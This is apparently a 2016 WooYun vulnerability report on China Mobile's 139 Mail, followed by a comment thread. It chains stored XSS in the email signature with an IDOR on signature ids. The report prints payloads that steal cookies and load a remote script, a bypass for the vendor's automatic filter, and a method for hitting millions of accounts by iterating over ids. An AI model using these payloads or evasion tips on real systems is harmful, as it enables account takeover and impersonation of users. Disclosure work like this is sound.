中国移动139邮箱存在漏洞可以控制百万账户

审核人员复现漏洞千万要记住，不要用alert prompt等关键字额，免得厂商还没处理，又被干掉了！

漏洞是利用储存型XSS+越权，可以控制百万的帐号，可以对帐号进行发短信，发邮件等操作。

最重要的是很隐蔽，难以被用户察觉，而且无需交互，就可以给大量用户埋下持久的XSS后门！

1 先说说漏洞点，在邮件的签名的编辑签名的位置，记得勾选上设置为默认。

2 编辑邮件前面，抓包，如下图。

3 post包是一个object，其中id位置是签名的id，也就是说，现在已经有600多万的有效签名了。

然后这个id是存在越权问题的，可以被越权修改他人的签名的权限。

然后content的位置就是签名的内容，是存在储存型XSS漏洞的。

虽然说这个XSS只能X自己，但是配合越权漏洞后，威力就可以插别人了！而且还是百万用户~

XSS poc：

<img src=x onerror=alert(1)>
 <iframe style=display:none src=x onerror=alert(document.cookie)>
 <iframe style=display:none src=x onerror=jQuery.getScript('//xxx/js')>

4 可以看到，这个XSS的触发点特别多，由于139邮箱的设计，其中有一段js文件，会在每个页面都加载 收件箱、邮件列表、还有个人签名的信息，所以会导致所有页面都会触发这个XSS！而且还是大概3-5分钟就会重新加载一次，也就是说如果保持页面不动，XSS每3-5分钟就会又触发一次。

点击写信，触发。

邮箱首页触发~

发短信的页面也会触发。利用xss可以给任意手机号以中招者的身份发短信~

5 然后正当我准备提交漏洞的时候，发现XSS漏洞竟然被修补了。然后想了想，肯定是因为139邮箱的自动回传检测修补机制干的，因为在前面截图证明的时候，把这玩意给忘了，所以使用了alert，导致被发现然后被修了，应该是自动检测修补机制吧。

那么没办法了，只能临时再去绕一绕了。

不一会儿，就绕过了，毕竟是自动只能修补，肯定只是会过滤上传的测试代码，不然也会影响业务的。

绕过后的XSS poc如下，很简单，换个标签就可以了。

<input onfocus=jQuery.getScript('//xxx/js') autofocus>

6 看看效果。

点击写信按钮。

首页也有加载我的js。

收件箱也是。

收个cookie截图下吧。

6 最后，再说说怎么利用，如下，固定写好xss代码，然后遍历去跑id就可以了。

然后根据不同时段的需求，去改js文件中的代码就可以了。

至于中招率，我2年前去遍历过1w个id，然后1天内有大概3k个左右的手机号中招了（手机号有进行去重过滤处理），所以中招率还是蛮高的。

如上描述。

1 修补越权漏洞。

2 修补XSS漏洞。

3 还有个问题也要说明下，我2年前发现漏洞的时候，这个id只有160w左右，现在已经涨到了600w+了，还是蛮快的！

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2016-03-25 17:41

厂商回复：

CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.

最新状态：

暂无

1. 2016-03-22 19:05 | hecate ( 普通白帽子 | Rank:823 漏洞数:129 | ®高级安全工程师 | WooYun认证√)

   1

   first

   1# 回复此人

2. 2016-03-22 19:09 | 90Snake ( 普通白帽子 | Rank:167 漏洞数:53 | 人如果没有梦想，跟咸鱼有什么分别)

   1

   两年

   2# 回复此人

3. 2016-03-22 19:11 | YY-2012 ( 核心白帽子 | Rank:3893 漏洞数:737 | 意淫，是《红楼梦》原创的词汇，但后来演变...)

   1

   xss就xss

   3# 回复此人

4. 2016-03-22 19:23 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:208 | px1624)

   1

   @YY-2012 xss 越权，组合利用。

   4# 回复此人

5. 2016-03-22 19:50 | 带我玩 ( 路人 | Rank:16 漏洞数:8 | 带我玩)

   1

   居然是两年没公开..这个数据你是获取暴利了>?

   5# 回复此人

6. 2016-03-22 20:03 | 暴走 ( 普通白帽子 | Rank:615 漏洞数:107 | 专心补刀。)

   1

   xss就xss

   6# 回复此人

7. 2016-03-22 21:43 | 小龙 ( 普通白帽子 | Rank:2794 漏洞数:546 | 我就问，还有谁！！！！！！！！！！！！！...)

   1

   旁总又暴走了

   7# 回复此人

8. 2016-03-22 23:00 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:208 | px1624)

   1

   @小龙 不知不觉rank已经被你拉开这么多了。。。

   8# 回复此人

9. 2016-03-22 23:00 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:208 | px1624)

   1

   @暴走 xss+越权~

   9# 回复此人

10. 2016-03-22 23:37 | Jason ( 路人 | Rank:0 漏洞数:1 | 我是来打酱油的！~~~)

    1

    139邮箱漏洞非常多的

    10# 回复此人

11. 2016-03-23 11:22 | 小龙 ( 普通白帽子 | Rank:2794 漏洞数:546 | 我就问，还有谁！！！！！！！！！！！！！...)

    1

    @px1624 旁总追我还不难吗…… 分分钟就超过我了……

    11# 回复此人